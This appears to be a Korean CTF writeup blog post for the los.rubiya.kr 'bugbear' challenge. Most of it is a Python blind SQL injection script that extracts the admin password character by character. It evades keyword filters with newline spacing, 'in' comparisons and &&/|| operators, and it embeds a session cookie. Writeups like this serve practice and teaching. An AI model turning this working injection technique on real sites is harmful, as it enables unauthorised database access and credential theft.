import requests
pw = ""
cookie = {"PHPSESSID": "bs5vokabo2qae2ome4934v09gr"}
page = "bugbear_19ebf8c8106a5323825b5dfa1b07ac1f"
code = '0||id%0ain%0a("admin")'
space = '%0a'
andsign = '%26%26'
equal = 'in'
_substr = 'mid'
_ascii = 'ord'
length = 0
print("find length")
for i in range(1, 32):
url = f"https://los.rubiya.kr/chall/{page}.php?no=" + \
f'{code}{space}{andsign}{space}length(pw){space}{equal}{space}({str(i)})'
print(url)
res = requests.get(url, cookies=cookie)
if "Hello admin" in res.text:
length = i
print(i)
break;
print("find password")
for i in range(1, length + 1):
for j in range(32, 128):
ch = chr(j).replace('"', '\\"')
url = f"https://los.rubiya.kr/chall/{page}.php?no=" + \
f'{code}{space}{andsign}{space}{_substr}(pw,{str(i)},1){space}{equal}{space}("{ch}")'
print(url)
res = requests.get(url, cookies=cookie)
if "Hello admin" in res.text:
pw += chr(j)
print(pw)
break
ord 빼버리고 그냥 문자열이랑 비교하고
비교는 in 으로 하고,
스페이스바는 \n 개행으로 하고
and와 or은 &&와 ||로 쓴다.
728x90
'해킹 > writeup' 카테고리의 다른 글
webhacking.kr - 14, 15, 16, 17 (1) | 2021.08.29 |
---|---|
los.rubiya.kr - giant (0) | 2021.08.29 |
los.rubiya.kr - darkknight (0) | 2021.08.29 |
webhacking.kr - 52 (0) | 2021.08.25 |
dreamhack.io - web-ssrf (0) | 2021.08.25 |